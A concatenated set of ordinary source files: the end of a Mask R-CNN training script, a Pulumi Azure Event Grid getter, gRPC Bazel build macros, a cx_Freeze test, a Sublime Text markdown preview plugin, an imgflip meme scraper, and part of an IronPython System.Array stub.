results = [DetectionResult(*args) for args in
zip(final_boxes, final_scores, final_labels,
[None] * len(final_labels))]
final_viz = draw_final_outputs(img, results)
viz = tpviz.stack_patches([
gt_viz, proposal_viz,
score_viz, final_viz], 2, 2)
if os.environ.get('DISPLAY', None):
tpviz.interactive_imshow(viz)
cv2.imwrite("{}/{:03d}.png".format(output_dir, idx), viz)
pbar.update()
def do_evaluate(pred_config, output_file):
num_gpu = cfg.TRAIN.NUM_GPUS
graph_funcs = MultiTowerOfflinePredictor(
pred_config, list(range(num_gpu))).get_predictors()
for dataset in cfg.DATA.VAL:
logger.info("Evaluating {} ...".format(dataset))
dataflows = [
get_eval_dataflow(dataset, shard=k, num_shards=num_gpu)
for k in range(num_gpu)]
all_results = multithread_predict_dataflow(dataflows, graph_funcs)
output = output_file + '-' + dataset
DetectionDataset().eval_or_save_inference_results(all_results, dataset, output)
def do_predict(pred_func, input_file):
img = cv2.imread(input_file, cv2.IMREAD_COLOR)
results = predict_image(img, pred_func)
final = draw_final_outputs(img, results)
viz = np.concatenate((img, final), axis=1)
cv2.imwrite("output.png", viz)
logger.info("Inference output for {} written to output.png".format(input_file))
tpviz.interactive_imshow(viz)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--load', help='load a model for evaluation or training. Can overwrite BACKBONE.WEIGHTS')
parser.add_argument('--logdir', help='log directory', default='train_log/maskrcnn')
parser.add_argument('--visualize', action='store_true', help='visualize intermediate results')
parser.add_argument('--evaluate', help="Run evaluation. "
"This argument is the path to the output json evaluation file")
parser.add_argument('--predict', help="Run prediction on a given image. "
"This argument is the path to the input image file", nargs='+')
parser.add_argument('--config', help="A list of KEY=VALUE to overwrite those defined in config.py",
nargs='+')
if get_tf_version_tuple() < (1, 6):
# https://github.com/tensorflow/tensorflow/issues/14657
logger.warn("TF<1.6 has a bug which may lead to crash in FasterRCNN if you're unlucky.")
args = parser.parse_args()
if args.config:
cfg.update_args(args.config)
MODEL = ResNetFPNModel() if cfg.MODE_FPN else ResNetC4Model()
DetectionDataset() # initialize the config with information from our dataset
if args.visualize or args.evaluate or args.predict:
if not tf.test.is_gpu_available():
from tensorflow.python.framework import test_util
assert get_tf_version_tuple() >= (1, 7) and test_util.IsMklEnabled(), \
"Inference requires either GPU support or MKL support!"
assert args.load
finalize_configs(is_training=False)
if args.predict or args.visualize:
cfg.TEST.RESULT_SCORE_THRESH = cfg.TEST.RESULT_SCORE_THRESH_VIS
if args.visualize:
do_visualize(MODEL, args.load)
else:
predcfg = PredictConfig(
model=MODEL,
session_init=get_model_loader(args.load),
input_names=MODEL.get_inference_tensor_names()[0],
output_names=MODEL.get_inference_tensor_names()[1])
if args.predict:
predictor = OfflinePredictor(predcfg)
for image_file in args.predict:
do_predict(predictor, image_file)
elif args.evaluate:
assert args.evaluate.endswith('.json'), args.evaluate
do_evaluate(predcfg, args.evaluate)
else:
is_horovod = cfg.TRAINER == 'horovod'
if is_horovod:
hvd.init()
logger.info("Horovod Rank={}, Size={}".format(hvd.rank(), hvd.size()))
if not is_horovod or hvd.rank() == 0:
logger.set_logger_dir(args.logdir, 'd')
logger.info("Environment Information:\n" + collect_env_info())
finalize_configs(is_training=True)
stepnum = cfg.TRAIN.STEPS_PER_EPOCH
# warmup is step based, lr is epoch based
init_lr = cfg.TRAIN.WARMUP_INIT_LR * min(8. / cfg.TRAIN.NUM_GPUS, 1.)
warmup_schedule = [(0, init_lr), (cfg.TRAIN.WARMUP, cfg.TRAIN.BASE_LR)]
warmup_end_epoch = cfg.TRAIN.WARMUP * 1. / stepnum
lr_schedule = [(int(warmup_end_epoch + 0.5), cfg.TRAIN.BASE_LR)]
factor = 8. / cfg.TRAIN.NUM_GPUS
for idx, steps in enumerate(cfg.TRAIN.LR_SCHEDULE[:-1]):
mult = 0.1 ** (idx + 1)
lr_schedule.append(
(steps * factor // stepnum, cfg.TRAIN.BASE_LR * mult))
logger.info("Warm Up Schedule (steps, value): " + str(warmup_schedule))
logger.info("LR Schedule (epochs, value): " + str(lr_schedule))
train_dataflow = get_train_dataflow()
# This is what's commonly referred to as "epochs"
total_passes = cfg.TRAIN.LR_SCHEDULE[-1] * 8 / train_dataflow.size()
logger.info("Total passes of the training set is: {:.5g}".format(total_passes))
callbacks = [
PeriodicCallback(
ModelSaver(max_to_keep=10, keep_checkpoint_every_n_hours=1),
every_k_epochs=20),
# linear warmup
ScheduledHyperParamSetter(
'learning_rate', warmup_schedule, interp='linear', step_based=True),
ScheduledHyperParamSetter('learning_rate', lr_schedule),
PeakMemoryTracker(),
EstimatedTimeLeft(median=True),
SessionRunTimeout(60000).set_chief_only(True), # 1 minute timeout
]
if cfg.TRAIN.EVAL_PERIOD > 0:
callbacks.extend([
EvalCallback(dataset, *MODEL.get_inference_tensor_names(), args.logdir)
for dataset in cfg.DATA.VAL
])
if not is_horovod:
callbacks.append(GPUUtilizationTracker())
if is_horovod and hvd.rank() > 0:
session_init = None
else:
if args.load:
session_init = get_model_loader(args.load)
else:
session_init = get_model_loader(cfg.BACKBONE.WEIGHTS) if cfg.BACKBONE.WEIGHTS else None
traincfg = TrainConfig(
model=MODEL,
data=QueueInput(train_dataflow),
callbacks=callbacks,
steps_per_epoch=stepnum,
max_epoch=cfg.TRAIN.LR_SCHEDULE[-1] * factor // stepnum,
session_init=session_init,
starting_epoch=cfg.TRAIN.STARTING_EPOCH
)
if is_horovod:
trainer = HorovodTrainer(average=False)
else:
# nccl mode appears faster than cpu mode
trainer = SyncMultiGPUTrainerReplicated(cfg.TRAIN.NUM_GPUS, average=False, mode='nccl')
launch_train_with_config(traincfg, trainer)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetDomainTopicResult',
'AwaitableGetDomainTopicResult',
'get_domain_topic',
]
warnings.warn("""The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.""", DeprecationWarning)
@pulumi.output_type
class GetDomainTopicResult:
"""
Domain Topic.
"""
def __init__(__self__, id=None, name=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified identifier of the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> Optional[str]:
"""
Provisioning state of the domain topic.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of the resource.
"""
return pulumi.get(self, "type")
class AwaitableGetDomainTopicResult(GetDomainTopicResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDomainTopicResult(
id=self.id,
name=self.name,
provisioning_state=self.provisioning_state,
type=self.type)
def get_domain_topic(domain_name: Optional[str] = None,
domain_topic_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDomainTopicResult:
"""
Domain Topic.
Latest API Version: 2020-06-01.
:param str domain_name: Name of the domain.
:param str domain_topic_name: Name of the topic.
:param str resource_group_name: The name of the resource group within the user's subscription.
"""
pulumi.log.warn("get_domain_topic is deprecated: The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.")
__args__ = dict()
__args__['domainName'] = domain_name
__args__['domainTopicName'] = domain_topic_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:eventgrid/latest:getDomainTopic', __args__, opts=opts, typ=GetDomainTopicResult).value
return AwaitableGetDomainTopicResult(
id=__ret__.id,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is for the gRPC build system. This isn't intended to be used outsite of
# the BUILD file for gRPC. It contains the mapping for the template system we
# use to generate other platform's build system files.
#
# Please consider that there should be a high bar for additions and changes to
# this file.
# Each rule listed must be re-written for Google's internal build system, and
# each change must be ported from one to the other.
#
load("//bazel:cc_grpc_library.bzl", "cc_grpc_library")
load("@upb//bazel:upb_proto_library.bzl", "upb_proto_library")
load("@build_bazel_rules_apple//apple:ios.bzl", "ios_unit_test")
# The set of pollers to test against if a test exercises polling
POLLERS = ["epollex", "epoll1", "poll"]
def if_not_windows(a):
return select({
"//:windows": [],
"//:windows_msvc": [],
"//conditions:default": a,
})
def if_mac(a):
return select({
"//:mac_x86_64": a,
"//conditions:default": [],
})
def _get_external_deps(external_deps):
ret = []
for dep in external_deps:
if dep == "address_sorting":
ret += ["//third_party/address_sorting"]
elif dep == "cares":
ret += select({
"//:grpc_no_ares": [],
"//conditions:default": ["//external:cares"],
})
elif dep == "cronet_c_for_grpc":
ret += ["//third_party/objective_c/Cronet:cronet_c_for_grpc"]
elif dep.startswith("absl/"):
ret += ["@com_google_absl//" + dep]
else:
ret += ["//external:" + dep]
return ret
def grpc_cc_library(
name,
srcs = [],
public_hdrs = [],
hdrs = [],
external_deps = [],
deps = [],
standalone = False,
language = "C++",
testonly = False,
visibility = None,
alwayslink = 0,
data = [],
use_cfstream = False,
tags = []):
copts = []
if use_cfstream:
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
linkopts = if_not_windows(["-pthread"])
if use_cfstream:
linkopts = linkopts + if_mac(["-framework CoreFoundation"])
native.cc_library(
name = name,
srcs = srcs,
defines = select({
"//:grpc_no_ares": ["GRPC_ARES=0"],
"//conditions:default": [],
}) +
select({
"//:remote_execution": ["GRPC_PORT_ISOLATED_RUNTIME=1"],
"//conditions:default": [],
}) +
select({
"//:grpc_allow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=1"],
"//:grpc_disallow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=0"],
"//conditions:default": [],
}) +
if_mac(["INSTALL_PREFIX=/usr/local"]),
hdrs = hdrs + public_hdrs,
deps = deps + _get_external_deps(external_deps),
copts = copts,
visibility = visibility,
testonly = testonly,
linkopts = linkopts,
includes = [
"include",
"src/core/ext/upb-generated", # Once upb code-gen issue is resolved, remove this.
],
alwayslink = alwayslink,
data = data,
tags = tags,
)
def grpc_proto_plugin(name, srcs = [], deps = []):
native.cc_binary(
name = name,
srcs = srcs,
deps = deps,
)
def grpc_proto_library(
name,
srcs = [],
deps = [],
well_known_protos = False,
has_services = True,
use_external = False,
generate_mocks = False):
cc_grpc_library(
name = name,
srcs = srcs,
deps = deps,
well_known_protos = well_known_protos,
proto_only = not has_services,
use_external = use_external,
generate_mocks = generate_mocks,
)
def ios_cc_test(
name,
tags = [],
**kwargs):
ios_test_adapter = "//third_party/objective_c/google_toolbox_for_mac:GTM_GoogleTestRunner_GTM_USING_XCTEST"
test_lib_ios = name + "_test_lib_ios"
ios_tags = tags + ["manual", "ios_cc_test"]
if not any([t for t in tags if t.startswith("no_test_ios")]):
native.objc_library(
name = test_lib_ios,
srcs = kwargs.get("srcs"),
deps = kwargs.get("deps"),
copts = kwargs.get("copts"),
tags = ios_tags,
alwayslink = 1,
testonly = 1,
)
ios_test_deps = [ios_test_adapter, ":" + test_lib_ios]
ios_unit_test(
name = name + "_on_ios",
size = kwargs.get("size"),
tags = ios_tags,
minimum_os_version = "9.0",
deps = ios_test_deps,
)
def grpc_cc_test(name, srcs = [], deps = [], external_deps = [], args = [], data = [], uses_polling = True, language = "C++", size = "medium", timeout = None, tags = [], exec_compatible_with = [], exec_properties = {}, shard_count = None, flaky = None):
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
# NOTE: these attributes won't be used for the poller-specific versions of a test
# automatically, you need to set them explicitly (if applicable)
args = {
"srcs": srcs,
"args": args,
"data": data,
"deps": deps + _get_external_deps(external_deps),
"copts": copts,
"linkopts": if_not_windows(["-pthread"]),
"size": size,
"timeout": timeout,
"exec_compatible_with": exec_compatible_with,
"exec_properties": exec_properties,
"shard_count": shard_count,
"flaky": flaky,
}
if uses_polling:
# the vanilla version of the test should run on platforms that only
# support a single poller
native.cc_test(
name = name,
testonly = True,
tags = (tags + [
"no_linux", # linux supports multiple pollers
]),
**args
)
# on linux we run the same test multiple times, once for each poller
for poller in POLLERS:
native.sh_test(
name = name + "@poller=" + poller,
data = [name] + data,
srcs = [
"//test/core/util:run_with_poller_sh",
],
size = size,
timeout = timeout,
args = [
poller,
"$(location %s)" % name,
] + args["args"],
tags = (tags + ["no_windows", "no_mac"]),
exec_compatible_with = exec_compatible_with,
exec_properties = exec_properties,
shard_count = shard_count,
flaky = flaky,
)
else:
# the test behavior doesn't depend on polling, just generate the test
native.cc_test(name = name, tags = tags + ["no_uses_polling"], **args)
ios_cc_test(
name = name,
tags = tags,
**args
)
def grpc_cc_binary(name, srcs = [], deps = [], external_deps = [], args = [], data = [], language = "C++", testonly = False, linkshared = False, linkopts = [], tags = []):
copts = []
if language.upper() == "C":
copts = ["-std=c99"]
native.cc_binary(
name = name,
srcs = srcs,
args = args,
data = data,
testonly = testonly,
linkshared = linkshared,
deps = deps + _get_external_deps(external_deps),
copts = copts,
linkopts = if_not_windows(["-pthread"]) + linkopts,
tags = tags,
)
def grpc_generate_one_off_targets():
# In open-source, grpc_objc* libraries depend directly on //:grpc
native.alias(
name = "grpc_objc",
actual = "//:grpc",
)
def grpc_generate_objc_one_off_targets():
pass
def grpc_sh_test(name, srcs, args = [], data = []):
native.sh_test(
name = name,
srcs = srcs,
args = args,
data = data,
)
def grpc_sh_binary(name, srcs, data = []):
native.sh_binary(
name = name,
srcs = srcs,
data = data,
)
def grpc_py_binary(
name,
srcs,
data = [],
deps = [],
external_deps = [],
testonly = False,
python_version = "PY2",
**kwargs):
native.py_binary(
name = name,
srcs = srcs,
testonly = testonly,
data = data,
deps = deps + _get_external_deps(external_deps),
python_version = python_version,
**kwargs
)
def grpc_package(name, visibility = "private", features = []):
if visibility == "tests":
visibility = ["//test:__subpackages__"]
elif visibility == "public":
visibility = ["//visibility:public"]
elif visibility == "private":
visibility = []
else:
fail("Unknown visibility " + visibility)
if len(visibility) != 0:
native.package(
default_visibility = visibility,
features = features,
)
def grpc_objc_library(
name,
srcs = [],
hdrs = [],
textual_hdrs = [],
data = [],
deps = [],
defines = [],
includes = [],
visibility = ["//visibility:public"]):
"""The grpc version of objc_library, only used for the Objective-C library compilation
Args:
name: name of target
hdrs: public headers
srcs: all source files (.m)
textual_hdrs: private headers
data: any other bundle resources
defines: preprocessors
includes: added to search path, always [the path to objc directory]
deps: dependencies
visibility: visibility, default to public
"""
native.objc_library(
name = name,
hdrs = hdrs,
srcs = srcs,
textual_hdrs = textual_hdrs,
data = data,
deps = deps,
defines = defines,
includes = includes,
visibility = visibility,
)
def grpc_upb_proto_library(name, deps):
upb_proto_library(name = name, deps = deps)
def python_config_settings():
native.config_setting(
name = "python3",
flag_values = {"@bazel_tools//tools/python:python_version": "PY3"},
)
|
import os.path
import sys
from nose.tools import assert_raises
from cx_Freeze.common import ConfigError, process_path_specs
rootdir = "C:\\" if sys.platform == "win32" else "/"
def test_process_path_specs():
inp = [
os.path.join(rootdir, "foo", "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
outp = process_path_specs(inp)
assert outp == [
(os.path.join(rootdir, "foo", "bar"), "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
def test_process_path_specs_bad():
with assert_raises(ConfigError):
process_path_specs(
[(os.path.join(rootdir, "foo"), os.path.join(rootdir, "bar"))]
)
with assert_raises(ConfigError):
process_path_specs([("a", "b", "c")])
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import webbrowser
import sublime
import sublime_plugin
from . import MDETextCommand
from . import plugin_name
from . import settings
from python_utils.misc_utils import get_system_tempdir
from python_utils.mistune_utils import md
from python_utils.sublime_text_utils.utils import get_file_path
from python_utils.sublime_text_utils.utils import get_view_context
from python_utils.sublime_text_utils.utils import substitute_variables
__all__ = [
"MdeMarkdownPreviewCommand",
"MdeMarkdownPreviewListener"
]
_html_template = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
<title>Markdown Editing Fork - Preview</title>
{stylesheets}
</head>
<body>
<div class="content boxed">
{content}
</div>
</body>
</html>
"""
_stylesheet_link_template = '<link rel="stylesheet" href="{href}" />'
class StorageClass():
def __init__(self):
self.open_previews = {}
Storage = StorageClass()
class MdeMarkdownPreviewCommand(MDETextCommand):
def run(self, edit):
file_path = get_file_path(self.view)
text = self.view.substr(sublime.Region(0, self.view.size()))
if not text or not file_path:
sublime.status_message("No content to preview")
return
html_file_id = "%d-%d" % (self.view.window().id(), self.view.id())
html_file_path = os.path.join(get_system_tempdir(), plugin_name, html_file_id + ".html")
os.makedirs(os.path.dirname(html_file_path), exist_ok=True)
with open(html_file_path, "w", encoding="UTF-8") as temp_file:
temp_file.write(_html_template.format(
stylesheets=self._ody_get_stylesheets(),
content=md(text))
)
if html_file_id not in Storage.open_previews:
Storage.open_previews = html_file_id
webbrowser.open(html_file_path, new=2, autoraise=True)
else:
sublime.status_message("Reload web page")
def _ody_get_stylesheets(self):
stylesheets = substitute_variables(get_view_context(
self.view), settings.get("preview_stylesheets"))
return "\n".join([_stylesheet_link_template.format(href=s)
for s in stylesheets]) if stylesheets else ""
class MdeMarkdownPreviewListener(sublime_plugin.EventListener):
def on_close(self, view):
if view and view.id() and view.window() and view.window().id():
html_file_id = "%d-%d" % (view.window().id(), view.id())
if html_file_id in Storage.open_previews:
del Storage.open_previews[html_file_id]
if __name__ == "__main__":
pass
|
import json
import time
import os
import pandas as pd
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm
def process_9gag(args):
fetched_memes = []
errors = 0
# for i in tqdm(range(args.))
pass
def process_me_dot_me(args):
pass
def templates_imgflip(args):
args.source_url = "https://imgflip.com/memetemplates"
fetched_templates = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
print(f"Requesting: {args.source_url}?page={i}")
response = requests.get(f"{args.source_url}?page={i}")
print(response)
if response.status_code != 200:
print("Bad response")
break
body = BeautifulSoup(response.text, 'html.parser')
templates = body.findAll("div", {"class": "mt-box"})
print(len(templates))
for template in templates:
try:
template_url = "https://"+template.find('img', {"class": "shadow"})['src'][2:]
template_id, template_format = os.path.splitext(template_url.split("/")[-1])
template_title = template.find("h3", {"class": "mt-title"}).find("a")
template_title = "" if template_title is None else template_title.text
template_data = {
"id": template_id,
"format": template_format,
"website": "imgflip",
"url": template_url,
"title": template_title
}
fetched_templates.append(template_data)
except:
errors += 1
# time.sleep(args.delay)
print(f"Fetched: {len(fetched_templates)} templates. Found {errors} error(s).")
return fetched_templates
def process_imgflip(args):
'''
https://gist.github.com/WalterSimoncini/defca6de456bb168ada303085358bf0a
'''
fetched_memes = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
# print(f"Processing page {i}")
response = requests.get(f"{args.source_url}?page={i}")
body = BeautifulSoup(response.text, 'html.parser')
if response.status_code != 200:
# print("Something went wrong!")
break # Something went wrong (e.g. page limit)
memes = body.findAll("div", {"class": "base-unit clearfix"})
for meme in memes:
if "not-safe-for-work images" in str(meme):
continue # NSFW memes are available only to logged in users
try:
meme_url = 'https://'+meme.find("img", {"class": "base-img"})["src"][2:]
meme_id, meme_format = os.path.splitext(meme_url.split("/")[-1])
# Handle anonymous authors
meme_author = meme.find("a", {"class": "u-username"})
meme_author = "anonymous" if meme_author is None else meme_author.text
# Handle empty titles
meme_title = meme.find("h2", {"class": "base-unit-title"}).find("a")
meme_title = "" if meme_title is None else meme_title.text
meme_text = meme.find("img", {"class": "base-img"})["alt"]
meme_text = meme_text.split("|")[1].strip()
meme_data = {
"id": meme_id,
"format": meme_format,
"website": "imgflip",
"url": meme_url,
"author": meme_author,
"title": meme_title,
"text": meme_text.lower()
}
fetched_memes.append(meme_data)
except:
errors += 1
time.sleep(args.delay)
print(f"Fetched: {len(fetched_memes)} memes. Found {errors} error(s).")
return fetched_memes
if __name__ == '__main__':
import argparse
ap = argparse.ArgumentParser()
# ap.add_argument("--source_url", default="https://imgflip.com/tag/programming", help="Memes list url (e.g. https://imgflip.com/meme/Bird-Box)", type=str)
ap.add_argument("--tag", required=True, type=str)#default=['programming', 'artificial intelligence', 'computer'], type=list)
ap.add_argument("--from_page", default=1, help="Initial page", type=int)
ap.add_argument("--pages", default=44, help="Maximum page number to be scraped", type=int)
ap.add_argument("--delay", default=2, help="Delay between page loads (seconds)", type=int)
ap.add_argument("-o", "--output", default="templates.tsv")
args = ap.parse_args()
# category = args.source_url.split("/")[-1].replace("-", " ")
# Get the data
data = {}
# for tag in args.tags:
print(f"Processing tag: {args.tag}")
# Get the data
# args.source_url = f"https://imgflip.com/tag/{args.tag.replace(' ', '+')}"
# data = process_imgflip(args)
# args.source_url = f"https://ww.9gag.com/search/?query={args.tag.replace(' ', '+')}"
# data = process_9gag(args)
data = templates_imgflip(args)
# Create a pd.DataFrame and save (append to existing .tsv)
df = pd.DataFrame(data)
print(df.head(20))
df.to_csv(args.output, sep='\t', index=False, mode='a')
|
class Array(object,ICloneable,IList,ICollection,IEnumerable,IStructuralComparable,IStructuralEquatable):
""" Provides methods for creating,manipulating,searching,and sorting arrays,thereby serving as the base class for all arrays in the common language runtime. """
@staticmethod
def AsReadOnly(array):
""" AsReadOnly[T](array: Array[T]) -> ReadOnlyCollection[T] """
pass
@staticmethod
def BinarySearch(array,*__args):
"""
BinarySearch[T](array: Array[T],value: T,comparer: IComparer[T]) -> int
BinarySearch[T](array: Array[T],value: T) -> int
BinarySearch[T](array: Array[T],index: int,length: int,value: T,comparer: IComparer[T]) -> int
BinarySearch[T](array: Array[T],index: int,length: int,value: T) -> int
BinarySearch(array: Array,index: int,length: int,value: object) -> int
Searches a range of elements in a one-dimensional sorted System.Array for a
value,using the System.IComparable interface implemented by each element of
the System.Array and by the specified value.
array: The sorted one-dimensional System.Array to search.
index: The starting index of the range to search.
length: The length of the range to search.
value: The object to search for.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,value: object) -> int
Searches an entire one-dimensional sorted System.Array for a specific element,
using the System.IComparable interface implemented by each element of the
System.Array and by the specified object.
array: The sorted one-dimensional System.Array to search.
value: The object to search for.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,index: int,length: int,value: object,comparer: IComparer) -> int
Searches a range of elements in a one-dimensional sorted System.Array for a
value,using the specified System.Collections.IComparer interface.
array: The sorted one-dimensional System.Array to search.
index: The starting index of the range to search.
length: The length of the range to search.
value: The object to search for.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or- null to use the System.IComparable implementation of each
element.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,value: object,comparer: IComparer) -> int
Searches an entire one-dimensional sorted System.Array for a value using the
specified System.Collections.IComparer interface.
array: The sorted one-dimensional System.Array to search.
value: The object to search for.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or- null to use the System.IComparable implementation of each
element.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
"""
pass
@staticmethod
def Clear(array,index,length):
"""
Clear(array: Array,index: int,length: int)
Sets a range of elements in the System.Array to zero,to false,or to null,
depending on the element type.
array: The System.Array whose elements need to be cleared.
index: The starting index of the range of elements to clear.
length: The number of elements to clear.
"""
pass
def Clone(self):
"""
Clone(self: Array) -> object
Creates a shallow copy of the System.Array.
Returns: A shallow copy of the System.Array.
"""
pass
@staticmethod
def ConstrainedCopy(sourceArray,sourceIndex,destinationArray,destinationIndex,length):
"""
ConstrainedCopy(sourceArray: Array,sourceIndex: int,destinationArray: Array,destinationIndex: int,length: int)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. Guarantees that all changes are undone if the copy does not
succeed completely.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 32-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 32-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 32-bit integer that represents the number of elements to copy.
"""
pass
@staticmethod
def ConvertAll(array,converter):
""" ConvertAll[(TInput,TOutput)](array: Array[TInput],converter: Converter[TInput,TOutput]) -> Array[TOutput] """
pass
@staticmethod
def Copy(sourceArray,*__args):
"""
Copy(sourceArray: Array,destinationArray: Array,length: Int64)
Copies a range of elements from an System.Array starting at the first element
and pastes them into another System.Array starting at the first element. The
length is specified as a 64-bit integer.
sourceArray: The System.Array that contains the data to copy.
destinationArray: The System.Array that receives the data.
length: A 64-bit integer that represents the number of elements to copy. The integer
must be between zero and System.Int32.MaxValue,inclusive.
Copy(sourceArray: Array,sourceIndex: Int64,destinationArray: Array,destinationIndex: Int64,length: Int64)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. The length and the indexes are specified as 64-bit integers.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 64-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 64-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 64-bit integer that represents the number of elements to copy. The integer
must be between zero and System.Int32.MaxValue,inclusive.
Copy(sourceArray: Array,destinationArray: Array,length: int)
Copies a range of elements from an System.Array starting at the first element
and pastes them into another System.Array starting at the first element. The
length is specified as a 32-bit integer.
sourceArray: The System.Array that contains the data to copy.
destinationArray: The System.Array that receives the data.
length: A 32-bit integer that represents the number of elements to copy.
Copy(sourceArray: Array,sourceIndex: int,destinationArray: Array,destinationIndex: int,length: int)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. The length and the indexes are specified as 32-bit integers.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 32-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 32-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 32-bit integer that represents the number of elements to copy.
"""
pass
def CopyTo(self,array,index):
"""
CopyTo(self: Array,array: Array,index: Int64)
Copies all the elements of the current one-dimensional System.Array to the
specified one-dimensional System.Array starting at the specified destination
System.Array index. The index is specified as a 64-bit integer.
array: The one-dimensional System.Array that is the destination of the elements copied
from the current System.Array.
index: A 64-bit integer that represents the index in array at which copying begins.
CopyTo(self: Array,array: Array,index: int)
Copies all the elements of the current one-dimensional System.Array to the
specified one-dimensional System.Array starting at the specified destination
System.Array index. The index is specified as a 32-bit integer.
array: The one-dimensional System.Array that is the destination of the elements copied
from the current System.Array.
index: A 32-bit integer that represents the index in array at which copying begins.
"""
pass
@staticmethod
def CreateInstance(elementType,*__args):
"""
CreateInstance(elementType: Type,*lengths: Array[int]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing. The dimension lengths are
specified in an array of 32-bit integers.
elementType: The System.Type of the System.Array to create.
lengths: An array of 32-bit integers that represent the size of each dimension of the
System.Array to create.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,*lengths: Array[Int64]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing. The dimension lengths are
specified in an array of 64-bit integers.
elementType: The System.Type of the System.Array to create.
lengths: An array of 64-bit integers that represent the size of each dimension of the
System.Array to create. Each integer in the array must be between zero and
System.Int32.MaxValue,inclusive.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,lengths: Array[int],lowerBounds: Array[int]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with the specified lower bounds.
elementType: The System.Type of the System.Array to create.
lengths: A one-dimensional array that contains the size of each dimension of the
System.Array to create.
